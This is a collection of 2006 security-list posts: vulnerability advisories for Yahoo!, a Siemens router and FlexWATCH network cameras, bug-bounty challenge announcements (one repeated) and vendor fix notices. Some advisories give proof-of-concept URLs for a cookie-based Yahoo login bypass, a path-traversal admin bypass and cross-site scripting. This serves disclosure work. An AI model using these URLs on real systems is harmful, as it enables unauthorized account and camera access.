Digital Armaments advisory for Platinum Subcription is 06.20.2006 Digital Armaments public advisory is 12.07.2006 http://www.digitalarmaments.com/2006061285940301.html I. Background Yahoo! Inc. is an American computer services company with a mission to be the most essential global Internet service for consumers and businesses. It operates an Internet portal, including the popular Yahoo! Mail.According to Web trends Yahoo! is the most visited website on the Internet today with more than 400 million unique users. The global network of Yahoo! websites received 3.4 billion page views per day on average as of October 2005. Various Yahoo! services are vulnerable to authentication bypass vulnerability. Further information or detail about the software you can refer to the vendor's homepage: http://www.yahoo.com/ II. Problem Description Authentication Bypass and Session Binding Vulnerability. A malicious user can log on to the yahoo without submitting the username and password by constructing a malicious URL using cookies. Same session (URL) can be used to login multiple times from multiple IP address leading to session binding vulnerability. Example of Proof-of-concept (sk d is session): -- http://msg.edit.yahoo.com/config/reset_cookies?.y=Y=v=1%26n=0kvgvgv3qlf11 %26l=i42.j4ij/o.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0 BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--.done=http%3a//mail.yahoo.com -- http://msg.edit.yahoo.com/config/reset_cookies?.y=Y=v=1%26n=0kvgvgv3qlf11 %26l=i42.j4ij/o%26p=m2gvvind13000700.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMU FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E-.done=http %3a//mail.yahoo.com -- III. Detection This problem has been detected on online version of Yahoo website. IV. Impact analysis A malicious user can log on to the yahoo without submitting the username and password by constructing a malicious URL using cookies. V. Credit anonymous Get paid and get stocks by vulnerability submission http://www.digitalarmaments.com/contribute.html VI. Legal Notices Copyright © 2006 Digital Armaments Inc.. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission.Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Digital Armaments November-Decemberr Hacking Challenge: KERNEL
Challenge pubblication is 11.02.2006 http://www.digitalarmaments.com/challenge200611849937.html I. Details Digital Armaments officially announce the launch of November-December hacking challenge. The challenge starts on November 1. For the November-December Challenge, Digital Armaments will give 5000 credits EXTRA for each KERNEL vulnerability submission that results in a remote code execution vulnerability. It is valid for any OS Kernel. The submission must be sent during the November/December months and be received by midnight EST on December 31, 2006. The 5000 credits prizes will be given on the publication of a official advisory regarding the vulnerability. The 5000 credits will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2006 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email customerservice (at) digitalarmaments (dot) com [email concealed] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
igital Armaments November-Decemberr Hacking Challenge: KERNEL Remote
Challenge pubblication is 11.02.2006 http://www.digitalarmaments.com/challenge200611849937.html I. Details Digital Armaments officially announce the launch of November-December hacking challenge. The challenge starts on November 1. For the November-December Challenge, Digital Armaments will give 5000 credits EXTRA for each KERNEL vulnerability submission that results in a remote code execution vulnerability. It is valid for any OS Kernel. The submission must be sent during the November/December months and be received by midnight EST on December 31, 2006. The 5000 credits prizes will be given on the publication of a official advisory regarding the vulnerability. The 5000 credits will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2006 Digital Armaments Inc. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
new version of phplist fix XSS vulnerability
phplist, http://www.phplist.com is a popular open source newsletter application written in PHP. An XSS vulnerability has been found, in the public pages of the application. This issue has been addressed in the latest release 2.10.3, available from www.phplist.com Versions affected: any version up to 2.10.2 Credits: MustLive, Administrator of Websecurity web site, http://websecurity.com.ua discovered the vulnerability and contacted the vendor more information at http://websecurity.com.ua/267/ This release also includes the documented fixes for the local file include vulnerability http://www.securityfocus.com/bid/17429 Michiel Dethmers
Digital Armaments September-October Hacking Challenge: Explorer and Mozilla
Challenge Publication is 09.15.2006 http://www.digitalarmaments.com/challange200609253923.html I. Details Digital Armaments officially announce the launch of September-October hacking challenge. The challenge starts on September 1. For the September-October Challenge, Digital Armaments will give 5000 credits EXTRA for each vulnerability submission that results in a code execution vulnerability of Internet Explorer or Mozilla Firefox. The submission must be sent during the September/October months and be received by midnight EST on October 31, 2006. The 5000 credits prizes will be given on the publication of a official advisory regarding the vulnerability. The 5000 credits will be an extra added to the normal vulnerability payment (check the DACP scheme). II. References For further information on Digital Armaments Contributor Program (DACP) please refer at: http://www.digitalarmaments.com/contribute.html Details of credits value can be found at: http://www.digitalarmaments.com/contribute.html#credit III. Legal Notices Copyright © 2006 Digital Armaments Inc.. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Digital Armaments Security Advisory 24.07.2006: Siemens Speedstream Wireless/Router Denial of Service Vulnerability
Digital Armaments advisory is 05.4.2006 http://www.digitalarmaments.com/2006310665340982.html I. Background The SpeedStream Wireless DSL/Cable Router is usually adopted for home and small business solutions. Together with an existing DSL or cable modem connection, this affordable, easy to use connection sharing solution brings the freedom of high-speed, wireless broadband connectivity to home and SOHO networks. Its comprehensive functionality provides vital firewall protection, IP sharing capabilities, and fundamental routing features that support popular protocols like NetMeeting and VPN. For further information or detail about the software you can refer to the vendor's homepage: http://subscriber.communications.siemens.com/ II. Problem Description It is possible with a specially crafted packet sent to the Web Server that permit Administration of the Router to freeze it. III. Detection This problem has been detected on latest version of Siemens Speedstrem Router. It has been tested on the Speedstream 2624. IV. Impact analysis Successful exploitation allow an attacker to freeze the router. Reboot is necessary. V. Solution First notification 05.04.2006. Second notification 05.24.2006. No answer from the vendor. VI. Credit Jaime Blasco - [EMAIL PROTECTED] is credited with this discovery. Get paid and get stocks by vulnerability submission http://www.digitalarmaments.com/contribute.html VII. Legal Notices Copyright © 2006 Digital Armaments LLC. Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprint the whole is allowed, partial reprint is not permitted. For any other request please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: imageVue16.1 upload vulnerability
This was fixed in April with the release of imagevue 16.2. You still will be able to see XML relative folder tree, but that is pretty futile aslong as there is no upload vulnerability.
Re: ATutor 1.5.3 Cross Site Scripting
The XXS issues have been patched and will be available in the coming maintenance release (1.5.3_pl1) The mentioned SQL injection vulnerability is not possible. Please remove it.
Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability
Digital Armaments advisory is 04.15.2006
http://www.digitalarmaments.com/2006300687985463.html
I. Background
FlexWATCH is a stand-alone network camera server with built-in CMOS camera and
web server which deliver crisp real time live videos at a rate up to 30fps over
the network. It is normally used as security camera.
For further information or detail about the software you can refer to the
vendor's homepage:
http://www.flexwatch.com/
II. Problem Description
Flexwatch Network Cameras are vulnerable to two security flaws, allowing a
cross site scripting and bypassing the protected areas. Here detailed:
- Cross-site scripting:
An attacker can cause a Cross-site-scripting:
http://camera/%3Cscript%3Ealert('www.eazel.es')%3C/script%3E
- Authorization Bypassing:
An attacker can bypass the protection of protected pages using /..%2f and
access to administrative area:
Network Camera V3.0: http://camera/..%2fadmin/aindex.asp
Networks Camera Prior versions: http://camera/app/..%2fadmin/aindex.htm
III. Detection
This problem has been detected on latest and older version of Flexwatch Network
Cameras.
Network Camera Versions tested on:
- ver 3.0 for FW-3400-A(PAL)
- ver 2.0 (PAL)
- ver 2.3 (NTSC)
IV. Impact analysis
Successful exploitation allow an attacker to bypass authorization and access
the image/video of the security camera. Cross site attacks are also possible.
V. Solution
First notification 04.16.2006.
Second notification 04.22.2006.
No answer from the vendor.
VI. Credit
Jaime Blasco - [EMAIL PROTECTED] is credited with this discovery.
Get paid and get stocks by vulnerability submission
http://www.digitalarmaments.com/contribute.html
VII. Legal Notices
Copyright © 2006 Digital Armaments LLC.
Redistribution of this alert electronically is allowed. It should not be edited
in any way. Reprint the whole is allowed, partial reprint is not permitted. For
any other request please email [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect, or consequential loss
or damage arising from use of, or reliance on, this information.
